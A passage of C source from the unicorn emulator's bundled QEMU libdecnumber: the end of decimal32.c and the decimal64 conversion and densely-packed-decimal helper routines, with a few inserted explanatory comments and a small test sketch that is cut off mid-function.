  (d)->bytes[0]|=(uint8_t)((e)>>4);                                \
  (d)->bytes[1]|=(uint8_t)(((e)&0x0F)<<4);}

/* ------------------------------------------------------------------ */
/* decimal32Show -- display a decimal32 in hexadecimal [debug aid]    */
/*   d32 -- the number to show                                        */
/* ------------------------------------------------------------------ */
/* Also shows sign/comb/expcon fields extracted - valid big-endian only */
void decimal32Show(const decimal32 *d32) {
  char buf[DECIMAL32_Bytes*2+1];
  Int i, j=0;

  if (DECLITEND) {
    for (i=0; i<DECIMAL32_Bytes; i++, j+=2) {
      sprintf(&buf[j], "%02x", d32->bytes[3-i]);
      }
    printf(" D32> %s [S:%d Cb:%02x Ec:%02x] LittleEndian\n", buf,
           d32->bytes[3]>>7, (d32->bytes[3]>>2)&0x1f,
           ((d32->bytes[3]&0x3)<<4)| (d32->bytes[2]>>4));
    }
   else {
    for (i=0; i<DECIMAL32_Bytes; i++, j+=2) {
      sprintf(&buf[j], "%02x", d32->bytes[i]);
      }
    printf(" D32> %s [S:%d Cb:%02x Ec:%02x] BigEndian\n", buf,
           decimal32Sign(d32), decimal32Comb(d32), decimal32ExpCon(d32));
    }
  } /* decimal32Show */
#endif
unicorn-2.1.1/qemu/libdecnumber/dpd/decimal64.c 0000664 0000000 0000000 00000100267 14675241067 0021277 0 ustar 00root root
/* Decimal 64-bit format module for the decNumber C Library.
   Copyright (C) 2005, 2007 Free Software Foundation, Inc.
   Contributed by IBM Corporation.  Author Mike Cowlishaw.

   This file is part of GCC.

   GCC is free software; you can redistribute it and/or modify it under
   the terms of the GNU General Public License as published by the Free
   Software Foundation; either version 2, or (at your option) any later
   version.

   In addition to the permissions in the GNU General Public License,
   the Free Software Foundation gives you unlimited permission to link
   the compiled version of this file into combinations with other
   programs, and to distribute those combinations without any
   restriction coming from the use of this file.  (The General Public
   License restrictions do apply in other respects; for example, they
   cover modification of the file, and distribution when not linked
   into a combine executable.)

   GCC is distributed in the hope that it will be useful, but WITHOUT
   ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
   or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public
   License for more details.

   You should have received a copy of the GNU General Public License
   along with GCC; see the file COPYING.
If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 64-bit format module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for decimal64 format numbers. */ /* Conversions are supplied to and from decNumber and String. */ /* */ /* This is used when decNumber provides operations, either for all */ /* operations or as a proxy between decNumber and decSingle. */ /* */ /* Error handling is the same as decNumber (qv.). */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #define DECNUMDIGITS 16 /* make decNumbers with space for 16 */ #include "libdecnumber/decNumber.h" #include "libdecnumber/decNumberLocal.h" #include "libdecnumber/dpd/decimal64.h" /* Utility routines and tables [in decimal64.c]; externs for C++ */ extern const uInt COMBEXP[32], COMBMSD[32]; extern const uByte BIN2CHAR[4001]; extern void decDigitsFromDPD(decNumber *, const uInt *, Int); extern void decDigitsToDPD(const decNumber *, uInt *, Int); #if DECTRACE || DECCHECK void decimal64Show(const decimal64 *); /* for debug */ extern void decNumberShow(const decNumber *); /* .. */ #endif /* Useful macro */ /* Clear a structure (e.g., a decNumber) */ #define DEC_clear(d) memset(d, 0, sizeof(*d)) /* define and include the tables to use for conversions */ #define DEC_BIN2CHAR 1 #define DEC_DPD2BIN 1 #define DEC_BIN2DPD 1 /* used for all sizes */ #include "libdecnumber/decDPD.h" /* ------------------------------------------------------------------ */ /* decimal64FromNumber -- convert decNumber to decimal64 */ /* */ /* ds is the target decimal64 */ /* dn is the source number (assumed valid) */ /* set is the context, used only for reporting errors */ /* */ /* The set argument is used only for status reporting and for the */ /* rounding mode (used if the coefficient is more than DECIMAL64_Pmax */ /* digits or an overflow is detected). If the exponent is out of the */ /* valid range then Overflow or Underflow will be raised. */ /* After Underflow a subnormal result is possible. */ /* */ /* DEC_Clamped is set if the number has to be 'folded down' to fit, */ /* by reducing its exponent and multiplying the coefficient by a */ /* power of ten, or if the exponent on a zero had to be clamped. */ /* ------------------------------------------------------------------ */ decimal64 * decimal64FromNumber(decimal64 *d64, const decNumber *dn, decContext *set) { uInt status=0; /* status accumulator */ Int ae; /* adjusted exponent */ decNumber dw; /* work */ decContext dc; /* .. */ uInt *pu; /* .. */ uInt comb, exp; /* .. */ uInt targar[2]={0, 0}; /* target 64-bit */ #define targhi targar[1] /* name the word with the sign */ #define targlo targar[0] /* and the other */ /* If the number has too many digits, or the exponent could be */ /* out of range then reduce the number under the appropriate */ /* constraints. 
This could push the number to Infinity or zero, */ /* so this check and rounding must be done before generating the */ /* decimal64] */ ae=dn->exponent+dn->digits-1; /* [0 if special] */ if (dn->digits>DECIMAL64_Pmax /* too many digits */ || ae>DECIMAL64_Emax /* likely overflow */ || ae<DECIMAL64_Emin) { /* likely underflow */ decContextDefault(&dc, DEC_INIT_DECIMAL64); /* [no traps] */ dc.round=set->round; /* use supplied rounding */ decNumberPlus(&dw, dn, &dc); /* (round and check) */ /* [this changes -0 to 0, so enforce the sign...] */ dw.bits|=dn->bits&DECNEG; status=dc.status; /* save status */ dn=&dw; /* use the work number */ } /* maybe out of range */ if (dn->bits&DECSPECIAL) { /* a special value */ if (dn->bits&DECINF) targhi=DECIMAL_Inf<<24; else { /* sNaN or qNaN */ if ((*dn->lsu!=0 || dn->digits>1) /* non-zero coefficient */ && (dn->digits<DECIMAL64_Pmax)) { /* coefficient fits */ decDigitsToDPD(dn, targar, 0); } if (dn->bits&DECNAN) targhi|=DECIMAL_NaN<<24; else targhi|=DECIMAL_sNaN<<24; } /* a NaN */ } /* special */ else { /* is finite */ if (decNumberIsZero(dn)) { /* is a zero */ /* set and clamp exponent */ if (dn->exponent<-DECIMAL64_Bias) { exp=0; /* low clamp */ status|=DEC_Clamped; } else { exp=dn->exponent+DECIMAL64_Bias; /* bias exponent */ if (exp>DECIMAL64_Ehigh) { /* top clamp */ exp=DECIMAL64_Ehigh; status|=DEC_Clamped; } } comb=(exp>>5) & 0x18; /* msd=0, exp top 2 bits .. */ } else { /* non-zero finite number */ uInt msd; /* work */ Int pad=0; /* coefficient pad digits */ /* the dn is known to fit, but it may need to be padded */ exp=(uInt)(dn->exponent+DECIMAL64_Bias); /* bias exponent */ if (exp>DECIMAL64_Ehigh) { /* fold-down case */ pad=exp-DECIMAL64_Ehigh; exp=DECIMAL64_Ehigh; /* [to maximum] */ status|=DEC_Clamped; } /* fastpath common case */ if (DECDPUN==3 && pad==0) { uInt dpd[6]={0,0,0,0,0,0}; uInt i; Int d=dn->digits; for (i=0; d>0; i++, d-=3) dpd[i]=BIN2DPD[dn->lsu[i]]; targlo =dpd[0]; targlo|=dpd[1]<<10; targlo|=dpd[2]<<20; if (dn->digits>6) { targlo|=dpd[3]<<30; targhi =dpd[3]>>2; targhi|=dpd[4]<<8; } msd=dpd[5]; /* [did not really need conversion] */ } else { /* general case */ decDigitsToDPD(dn, targar, pad); /* save and clear the top digit */ msd=targhi>>18; targhi&=0x0003ffff; } /* create the combination field */ if (msd>=8) comb=0x18 | ((exp>>7) & 0x06) | (msd & 0x01); else comb=((exp>>5) & 0x18) | msd; } targhi|=comb<<26; /* add combination field .. */ targhi|=(exp&0xff)<<18; /* .. and exponent continuation */ } /* finite */ if (dn->bits&DECNEG) targhi|=0x80000000; /* add sign bit */ /* now write to storage; this is now always endian */ pu=(uInt *)d64->bytes; /* overlay */ if (DECLITEND) { pu[0]=targar[0]; /* directly store the low int */ pu[1]=targar[1]; /* then the high int */ } else { pu[0]=targar[1]; /* directly store the high int */ pu[1]=targar[0]; /* then the low int */ } if (status!=0) decContextSetStatus(set, status); /* pass on status */ /* decimal64Show(d64); */ return d64; } /* decimal64FromNumber */ /* ------------------------------------------------------------------ */ /* decimal64ToNumber -- convert decimal64 to decNumber */ /* d64 is the source decimal64 */ /* dn is the target number, with appropriate space */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decNumber * decimal64ToNumber(const decimal64 *d64, decNumber *dn) { uInt msd; /* coefficient MSD */ uInt exp; /* exponent top two bits */ uInt comb; /* combination field */ const uInt *pu; /* work */ Int need; /* .. 
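/* ------------------------------------------------------------------ */
/* [Editor's note, added for clarity] The 50 coefficient-continuation */
/* bits of decimal64 straddle the word boundary: declets 1-3 fill     */
/* targlo bits 0-29, declet 4 is split (low two bits at targlo 30-31, */
/* high eight at targhi 0-7), declet 5 sits at targhi 8-17, and the   */
/* 16th digit rides in the combination field.  That is what the       */
/* dpd[3]<<30 / dpd[3]>>2 pair in the fast path above is doing.       */
/* ------------------------------------------------------------------ */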
*/ uInt sourar[2]; /* source 64-bit */ #define sourhi sourar[1] /* name the word with the sign */ #define sourlo sourar[0] /* and the lower word */ /* load source from storage; this is endian */ pu=(const uInt *)d64->bytes; /* overlay */ if (DECLITEND) { sourlo=pu[0]; /* directly load the low int */ sourhi=pu[1]; /* then the high int */ } else { sourhi=pu[0]; /* directly load the high int */ sourlo=pu[1]; /* then the low int */ } comb=(sourhi>>26)&0x1f; /* combination field */ decNumberZero(dn); /* clean number */ if (sourhi&0x80000000) dn->bits=DECNEG; /* set sign if negative */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { /* is a special */ if (msd==0) { dn->bits|=DECINF; return dn; /* no coefficient needed */ } else if (sourhi&0x02000000) dn->bits|=DECSNAN; else dn->bits|=DECNAN; msd=0; /* no top digit */ } else { /* is a finite number */ dn->exponent=(exp<<8)+((sourhi>>18)&0xff)-DECIMAL64_Bias; /* unbiased */ } /* get the coefficient */ sourhi&=0x0003ffff; /* clean coefficient continuation */ if (msd) { /* non-zero msd */ sourhi|=msd<<18; /* prefix to coefficient */ need=6; /* process 6 declets */ } else { /* msd=0 */ if (!sourhi) { /* top word 0 */ if (!sourlo) return dn; /* easy: coefficient is 0 */ need=3; /* process at least 3 declets */ if (sourlo&0xc0000000) need++; /* process 4 declets */ /* [could reduce some more, here] */ } else { /* some bits in top word, msd=0 */ need=4; /* process at least 4 declets */ if (sourhi&0x0003ff00) need++; /* top declet!=0, process 5 */ } } /*msd=0 */ decDigitsFromDPD(dn, sourar, need); /* process declets */ return dn; } /* decimal64ToNumber */ /* ------------------------------------------------------------------ */ /* to-scientific-string -- conversion to numeric string */ /* to-engineering-string -- conversion to numeric string */ /* */ /* decimal64ToString(d64, string); */ /* decimal64ToEngString(d64, string); */ /* */ /* d64 is the decimal64 format number to convert */ /* string is the string where the result will be laid out */ /* */ /* string must be at least 24 characters */ /* */ /* No error is possible, and no status can be set. */ /* ------------------------------------------------------------------ */ char * decimal64ToEngString(const decimal64 *d64, char *string){ decNumber dn; /* work */ decimal64ToNumber(d64, &dn); decNumberToEngString(&dn, string); return string; } /* decimal64ToEngString */ char * decimal64ToString(const decimal64 *d64, char *string){ uInt msd; /* coefficient MSD */ Int exp; /* exponent top two bits or full */ uInt comb; /* combination field */ char *cstart; /* coefficient start */ char *c; /* output pointer in string */ const uInt *pu; /* work */ char *s, *t; /* .. (source, target) */ Int dpd; /* .. */ Int pre, e; /* .. */ const uByte *u; /* .. */ uInt sourar[2]; /* source 64-bit */ #define sourhi sourar[1] /* name the word with the sign */ #define sourlo sourar[0] /* and the lower word */ /* load source from storage; this is endian */ pu=(const uInt *)d64->bytes; /* overlay */ if (DECLITEND) { sourlo=pu[0]; /* directly load the low int */ sourhi=pu[1]; /* then the high int */ } else { sourhi=pu[0]; /* directly load the high int */ sourlo=pu[1]; /* then the low int */ } c=string; /* where result will go */ if (((Int)sourhi)<0) *c++='-'; /* handle sign */ comb=(sourhi>>26)&0x1f; /* combination field */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. 
*/ if (exp==3) { if (msd==0) { /* infinity */ strcpy(c, "Inf"); strcpy(c+3, "inity"); return string; /* easy */ } if (sourhi&0x02000000) *c++='s'; /* sNaN */ strcpy(c, "NaN"); /* complete word */ c+=3; /* step past */ if (sourlo==0 && (sourhi&0x0003ffff)==0) return string; /* zero payload */ /* otherwise drop through to add integer; set correct exp */ exp=0; msd=0; /* setup for following code */ } else exp=(exp<<8)+((sourhi>>18)&0xff)-DECIMAL64_Bias; /* convert 16 digits of significand to characters */ cstart=c; /* save start of coefficient */ if (msd) *c++='0'+(char)msd; /* non-zero most significant digit */ /* Now decode the declets. After extracting each one, it is */ /* decoded to binary and then to a 4-char sequence by table lookup; */ /* the 4-chars are a 1-char length (significant digits, except 000 */ /* has length 0). This allows us to left-align the first declet */ /* with non-zero content, then remaining ones are full 3-char */ /* length. We use fixed-length memcpys because variable-length */ /* causes a subroutine call in GCC. (These are length 4 for speed */ /* and are safe because the array has an extra terminator byte.) */ #define dpd2char u=&BIN2CHAR[DPD2BIN[dpd]*4]; \ if (c!=cstart) {memcpy(c, u+1, 4); c+=3;} \ else if (*u) {memcpy(c, u+4-*u, 4); c+=*u;} dpd=(sourhi>>8)&0x3ff; /* declet 1 */ dpd2char; dpd=((sourhi&0xff)<<2) | (sourlo>>30); /* declet 2 */ dpd2char; dpd=(sourlo>>20)&0x3ff; /* declet 3 */ dpd2char; dpd=(sourlo>>10)&0x3ff; /* declet 4 */ dpd2char; dpd=(sourlo)&0x3ff; /* declet 5 */ dpd2char; if (c==cstart) *c++='0'; /* all zeros -- make 0 */ if (exp==0) { /* integer or NaN case -- easy */ *c='\0'; /* terminate */ return string; } /* non-0 exponent */ e=0; /* assume no E */ pre=c-cstart+exp; /* [here, pre-exp is the digits count (==1 for zero)] */ if (exp>0 || pre<-5) { /* need exponential form */ e=pre-1; /* calculate E value */ pre=1; /* assume one digit before '.' */ } /* exponential form */ /* modify the coefficient, adding 0s, '.', and E+nn as needed */ s=c-1; /* source (LSD) */ if (pre>0) { /* ddd.ddd (plain), perhaps with E */ char *dotat=cstart+pre; if (dotat<c) { /* if embedded dot needed... */ t=c; /* target */ for (; s>=dotat; s--, t--) *t=*s; /* open the gap; leave t at gap */ *t='.'; /* insert the dot */ c++; /* length increased by one */ } /* finally add the E-part, if needed; it will never be 0, and has */ /* a maximum length of 3 digits */ if (e!=0) { *c++='E'; /* starts with E */ *c++='+'; /* assume positive */ if (e<0) { *(c-1)='-'; /* oops, need '-' */ e=-e; /* uInt, please */ } u=&BIN2CHAR[e*4]; /* -> length byte */ memcpy(c, u+4-*u, 4); /* copy fixed 4 characters [is safe] */ c+=*u; /* bump pointer appropriately */ } *c='\0'; /* add terminator */ /*printf("res %s\n", string); */ return string; } /* pre>0 */ /* -5<=pre<=0: here for plain 0.ddd or 0.000ddd forms (can never have E) */ t=c+1-pre; *(t+1)='\0'; /* can add terminator now */ for (; s>=cstart; s--, t--) *t=*s; /* shift whole coefficient right */ c=cstart; *c++='0'; /* always starts with 0. */ *c++='.'; for (; pre<0; pre++) *c++='0'; /* add any 0's after '.' 
*/ /*printf("res %s\n", string); */ return string; } /* decimal64ToString */ /* ------------------------------------------------------------------ */ /* to-number -- conversion from numeric string */ /* */ /* decimal64FromString(result, string, set); */ /* */ /* result is the decimal64 format number which gets the result of */ /* the conversion */ /* *string is the character string which should contain a valid */ /* number (which may be a special value) */ /* set is the context */ /* */ /* The context is supplied to this routine is used for error handling */ /* (setting of status and traps) and for the rounding mode, only. */ /* If an error occurs, the result will be a valid decimal64 NaN. */ /* ------------------------------------------------------------------ */ decimal64 * decimal64FromString(decimal64 *result, const char *string, decContext *set) { decContext dc; /* work */ decNumber dn; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL64); /* no traps, please */ dc.round=set->round; /* use supplied rounding */ decNumberFromString(&dn, string, &dc); /* will round if needed */ decimal64FromNumber(result, &dn, &dc); if (dc.status!=0) { /* something happened */ decContextSetStatus(set, dc.status); /* .. pass it on */ } return result; } /* decimal64FromString */ /* ------------------------------------------------------------------ */ /* decimal64IsCanonical -- test whether encoding is canonical */ /* d64 is the source decimal64 */ /* returns 1 if the encoding of d64 is canonical, 0 otherwise */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uint32_t decimal64IsCanonical(const decimal64 *d64) { decNumber dn; /* work */ decimal64 canon; /* .. */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL64); decimal64ToNumber(d64, &dn); decimal64FromNumber(&canon, &dn, &dc);/* canon will now be canonical */ return memcmp(d64, &canon, DECIMAL64_Bytes)==0; } /* decimal64IsCanonical */ /* ------------------------------------------------------------------ */ /* decimal64Canonical -- copy an encoding, ensuring it is canonical */ /* d64 is the source decimal64 */ /* result is the target (may be the same decimal64) */ /* returns result */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decimal64 * decimal64Canonical(decimal64 *result, const decimal64 *d64) { decNumber dn; /* work */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL64); decimal64ToNumber(d64, &dn); decimal64FromNumber(result, &dn, &dc);/* result will now be canonical */ return result; } /* decimal64Canonical */ #if DECTRACE || DECCHECK /* Macros for accessing decimal64 fields. 
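/* ------------------------------------------------------------------ */
/* [Editor's usage sketch, not library code] decimal64IsCanonical and */
/* decimal64Canonical, defined above, normalise foreign encodings     */
/* before raw byte comparisons are trusted:                           */
/*                                                                    */
/*   if (!decimal64IsCanonical(&d64))     e.g. a redundant declet     */
/*     decimal64Canonical(&d64, &d64);    rewrite in place            */
/*                                                                    */
/* (the target may be the same decimal64, per the contract above).    */
/* ------------------------------------------------------------------ */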
These assume the argument is a reference (pointer) to the decimal64 structure, and the decimal64 is in network byte order (big-endian) */ /* Get sign */ #define decimal64Sign(d) ((unsigned)(d)->bytes[0]>>7) /* Get combination field */ #define decimal64Comb(d) (((d)->bytes[0] & 0x7c)>>2) /* Get exponent continuation [does not remove bias] */ #define decimal64ExpCon(d) ((((d)->bytes[0] & 0x03)<<6) \ | ((unsigned)(d)->bytes[1]>>2)) /* Set sign [this assumes sign previously 0] */ #define decimal64SetSign(d, b) { \ (d)->bytes[0]|=((unsigned)(b)<<7);} /* Set exponent continuation [does not apply bias] */ /* This assumes range has been checked and exponent previously 0; */ /* type of exponent must be unsigned */ #define decimal64SetExpCon(d, e) { \ (d)->bytes[0]|=(uint8_t)((e)>>6); \ (d)->bytes[1]|=(uint8_t)(((e)&0x3F)<<2);} /* ------------------------------------------------------------------ */ /* decimal64Show -- display a decimal64 in hexadecimal [debug aid] */ /* d64 -- the number to show */ /* ------------------------------------------------------------------ */ /* Also shows sign/comb/expcon fields extracted */ void decimal64Show(const decimal64 *d64) { char buf[DECIMAL64_Bytes*2+1]; Int i, j=0; if (DECLITEND) { for (i=0; i<DECIMAL64_Bytes; i++, j+=2) { sprintf(&buf[j], "%02x", d64->bytes[7-i]); } printf(" D64> %s [S:%d Cb:%02x Ec:%02x] LittleEndian\n", buf, d64->bytes[7]>>7, (d64->bytes[7]>>2)&0x1f, ((d64->bytes[7]&0x3)<<6)| (d64->bytes[6]>>2)); } else { /* big-endian */ for (i=0; i<DECIMAL64_Bytes; i++, j+=2) { sprintf(&buf[j], "%02x", d64->bytes[i]); } printf(" D64> %s [S:%d Cb:%02x Ec:%02x] BigEndian\n", buf, decimal64Sign(d64), decimal64Comb(d64), decimal64ExpCon(d64)); } } /* decimal64Show */ #endif /* ================================================================== */ /* Shared utility routines and tables */ /* ================================================================== */ /* define and include the conversion tables to use for shared code */ #if DECDPUN==3 #define DEC_DPD2BIN 1 #else #define DEC_DPD2BCD 1 #endif #include "libdecnumber/decDPD.h" /* The maximum number of decNumberUnits needed for a working copy of */ /* the units array is the ceiling of digits/DECDPUN, where digits is */ /* the maximum number of digits in any of the formats for which this */ /* is used. decimal128.h must not be included in this module, so, as */ /* a very special case, that number is defined as a literal here.
*/ #define DECMAX754 34 #define DECMAXUNITS ((DECMAX754+DECDPUN-1)/DECDPUN) /* ------------------------------------------------------------------ */ /* Combination field lookup tables (uInts to save measurable work) */ /* */ /* COMBEXP - 2-bit most-significant-bits of exponent */ /* [11 if an Infinity or NaN] */ /* COMBMSD - 4-bit most-significant-digit */ /* [0=Infinity, 1=NaN if COMBEXP=11] */ /* */ /* Both are indexed by the 5-bit combination field (0-31) */ /* ------------------------------------------------------------------ */ const uInt COMBEXP[32]={0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 0, 0, 1, 1, 2, 2, 3, 3}; const uInt COMBMSD[32]={0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 9, 8, 9, 0, 1}; /* ------------------------------------------------------------------ */ /* decDigitsToDPD -- pack coefficient into DPD form */ /* */ /* dn is the source number (assumed valid, max DECMAX754 digits) */ /* targ is 1, 2, or 4-element uInt array, which the caller must */ /* have cleared to zeros */ /* shift is the number of 0 digits to add on the right (normally 0) */ /* */ /* The coefficient must be known small enough to fit. The full */ /* coefficient is copied, including the leading 'odd' digit. This */ /* digit is retrieved and packed into the combination field by the */ /* caller. */ /* */ /* The target uInts are altered only as necessary to receive the */ /* digits of the decNumber. When more than one uInt is needed, they */ /* are filled from left to right (that is, the uInt at offset 0 will */ /* end up with the least-significant digits). */ /* */ /* shift is used for 'fold-down' padding. */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ #if DECDPUN<=4 /* Constant multipliers for divide-by-power-of five using reciprocal */ /* multiply, after removing powers of 2 by shifting, and final shift */ /* of 17 [we only need up to **4] */ static const uInt multies[]={131073, 26215, 5243, 1049, 210}; /* QUOT10 -- macro to return the quotient of unit u divided by 10**n */ #define QUOT10(u, n) ((((uInt)(u)>>(n))*multies[n])>>17) #endif void decDigitsToDPD(const decNumber *dn, uInt *targ, Int shift) { Int cut; /* work */ Int n; /* output bunch counter */ Int digits=dn->digits; /* digit countdown */ uInt dpd; /* densely packed decimal value */ uInt bin; /* binary value 0-999 */ uInt *uout=targ; /* -> current output uInt */ uInt uoff=0; /* -> current output offset [from right] */ const Unit *inu=dn->lsu; /* -> current input unit */ Unit uar[DECMAXUNITS]; /* working copy of units, iff shifted */ #if DECDPUN!=3 /* not fast path */ Unit in; /* current unit */ #endif if (shift!=0) { /* shift towards most significant required */ /* shift the units array to the left by pad digits and copy */ /* [this code is a special case of decShiftToMost, which could */ /* be used instead if exposed and the array were copied first] */ const Unit *source; /* .. */ Unit *target, *first; /* .. 
*/ uInt next=0; /* work */ source=dn->lsu+D2U(digits)-1; /* where msu comes from */ target=uar+D2U(digits)-1+D2U(shift);/* where upper part of first cut goes */ cut=DECDPUN-MSUDIGITS(shift); /* where to slice */ if (cut==0) { /* unit-boundary case */ for (; source>=dn->lsu; source--, target--) *target=*source; } else { first=uar+D2U(digits+shift)-1; /* where msu will end up */ for (; source>=dn->lsu; source--, target--) { /* split the source Unit and accumulate remainder for next */ #if DECDPUN<=4 uInt quot=QUOT10(*source, cut); uInt rem=*source-quot*DECPOWERS[cut]; next+=quot; #else uInt rem=*source%DECPOWERS[cut]; next+=*source/DECPOWERS[cut]; #endif if (target<=first) *target=(Unit)next; /* write to target iff valid */ next=rem*DECPOWERS[DECDPUN-cut]; /* save remainder for next Unit */ } } /* shift-move */ /* propagate remainder to one below and clear the rest */ for (; target>=uar; target--) { *target=(Unit)next; next=0; } digits+=shift; /* add count (shift) of zeros added */ inu=uar; /* use units in working array */ } /* now densely pack the coefficient into DPD declets */ #if DECDPUN!=3 /* not fast path */ in=*inu; /* current unit */ cut=0; /* at lowest digit */ bin=0; /* [keep compiler quiet] */ #endif for(n=0; digits>0; n++) { /* each output bunch */ #if DECDPUN==3 /* fast path, 3-at-a-time */ bin=*inu; /* 3 digits ready for convert */ digits-=3; /* [may go negative] */ inu++; /* may need another */ #else /* must collect digit-by-digit */ Unit dig; /* current digit */ Int j; /* digit-in-declet count */ for (j=0; j<3; j++) { #if DECDPUN<=4 Unit temp=(Unit)((uInt)(in*6554)>>16); dig=(Unit)(in-X10(temp)); in=temp; #else dig=in%10; in=in/10; #endif if (j==0) bin=dig; else if (j==1) bin+=X10(dig); else /* j==2 */ bin+=X100(dig); digits--; if (digits==0) break; /* [also protects *inu below] */ cut++; if (cut==DECDPUN) {inu++; in=*inu; cut=0;} } #endif /* here there are 3 digits in bin, or have used all input digits */ dpd=BIN2DPD[bin]; /* write declet to uInt array */ *uout|=dpd<<uoff; uoff+=10; if (uoff<32) continue; /* no uInt boundary cross */ uout++; uoff-=32; *uout|=dpd>>(10-uoff); /* collect top bits */ } /* n declets */ return; } /* decDigitsToDPD */ /* ------------------------------------------------------------------ */ /* decDigitsFromDPD -- unpack a format's coefficient */ /* */ /* dn is the target number, with 7, 16, or 34-digit space. */ /* sour is a 1, 2, or 4-element uInt array containing only declets */ /* declets is the number of (right-aligned) declets in sour to */ /* be processed. This may be 1 more than the obvious number in */ /* a format, as any top digit is prefixed to the coefficient */ /* continuation field. It also may be as small as 1, as the */ /* caller may pre-process leading zero declets. */ /* */ /* When doing the 'extra declet' case care is taken to avoid writing */ /* extra digits when there are leading zeros, as these could overflow */ /* the units array when DECDPUN is not 3. */ /* */ /* The target uInts are used only as necessary to process declets */ /* declets into the decNumber. When more than one uInt is needed, */ /* they are used from left to right (that is, the uInt at offset 0 */ /* provides the least-significant digits). */ /* */ /* dn->digits is set, but not the sign or exponent. */ /* No error is possible [the redundant 888 codes are allowed]. 
*/ /* ------------------------------------------------------------------ */ void decDigitsFromDPD(decNumber *dn, const uInt *sour, Int declets) { uInt dpd; /* collector for 10 bits */ Int n; /* counter */ Unit *uout=dn->lsu; /* -> current output unit */ Unit *last=uout; /* will be unit containing msd */ const uInt *uin=sour; /* -> current input uInt */ uInt uoff=0; /* -> current input offset [from right] */ #if DECDPUN!=3 uInt bcd; /* BCD result */ uInt nibble; /* work */ Unit out=0; /* accumulator */ Int cut=0; /* power of ten in current unit */ #endif #if DECDPUN>4 uInt const *pow; /* work */ #endif /* Expand the densely-packed integer, right to left */ for (n=declets-1; n>=0; n--) { /* count down declets of 10 bits */ dpd=*uin>>uoff; uoff+=10; if (uoff>32) { /* crossed uInt boundary */ uin++; uoff-=32; dpd|=*uin<<(10-uoff); /* get waiting bits */ } dpd&=0x3ff; /* clear uninteresting bits */ #if DECDPUN==3 if (dpd==0) *uout=0; else { *uout=DPD2BIN[dpd]; /* convert 10 bits to binary 0-999 */ last=uout; /* record most significant unit */ } uout++; } /* n */ #else /* DECDPUN!=3 */ if (dpd==0) { /* fastpath [e.g., leading zeros] */ /* write out three 0 digits (nibbles); out may have digit(s) */ cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} if (n==0) break; /* [as below, works even if MSD=0] */ cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} continue; } bcd=DPD2BCD[dpd]; /* convert 10 bits to 12 bits BCD */ /* now accumulate the 3 BCD nibbles into units */ nibble=bcd & 0x00f; if (nibble) out=(Unit)(out+nibble*DECPOWERS[cut]); cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} bcd>>=4; /* if this is the last declet and the remaining nibbles in bcd */ /* are 00 then process no more nibbles, because this could be */ /* the 'odd' MSD declet and writing any more Units would then */ /* overflow the unit array */ if (n==0 && !bcd) break; nibble=bcd & 0x00f; if (nibble) out=(Unit)(out+nibble*DECPOWERS[cut]); cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} bcd>>=4; nibble=bcd & 0x00f; if (nibble) out=(Unit)(out+nibble*DECPOWERS[cut]); cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} } /* n */ if (cut!=0) { /* some more left over */ *uout=out; /* write out final unit */ if (out) last=uout; /* and note if non-zero */ } #endif /* here, last points to the most significant unit with digits; */ /* inspect it to get the final digits count -- this is essentially */ /* the same code as decGetDigits in decNumber.c */ dn->digits=(last-dn->lsu)*DECDPUN+1; /* floor of digits, plus */ /* must be at least 1 digit */ #if DECDPUN>1 if (*last<10) return; /* common odd digit or 0 */ dn->digits++; /* must be 2 at least */ #if DECDPUN>2 if (*last<100) return; /* 10-99 */ dn->digits++; /* must be 3 at least */ #if DECDPUN>3 if (*last<1000) return; /* 100-999 */ dn->digits++; /* must be 4 at least */ #if DECDPUN>4 for (pow=&DECPOWERS[4]; *last>=*pow; pow++) dn->digits++; #endif #endif #endif #endif return; } /*decDigitsFromDPD */ 
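/* ------------------------------------------------------------------ */
/* Editor's sketch -- NOT part of decNumber.  A standalone check of   */
/* the QUOT10 reciprocal-multiply trick used by decDigitsToDPD above  */
/* when DECDPUN<=4: dividing a unit u by 10**n is done by shifting    */
/* out the factor 2**n and then multiplying by ceil(2**17/5**n),      */
/* keeping only the top bits.  The multies[] constants are copied     */
/* from the source above; the file name and everything else here are  */
/* illustrative.  Build and run, e.g.:  cc quot10_check.c && ./a.out  */
/* ------------------------------------------------------------------ */
#include <stdio.h>
#include <stdint.h>

static const uint32_t multies[]={131073, 26215, 5243, 1049, 210};

/* quotient of unit u divided by 10**n, exactly as in decimal64.c */
#define QUOT10(u, n) ((((uint32_t)(u)>>(n))*multies[n])>>17)

int main(void) {
    static const uint32_t powers[]={1, 10, 100, 1000, 10000};
    uint32_t u, n;
    for (n=0; n<=4; n++) {              /* the macro is only needed up to **4 */
        for (u=0; u<=9999; u++) {       /* maximum unit value when DECDPUN==4 */
            if (QUOT10(u, n)!=u/powers[n]) {
                printf("QUOT10 mismatch at u=%u, n=%u\n", u, n);
                return 1;
            }
        }
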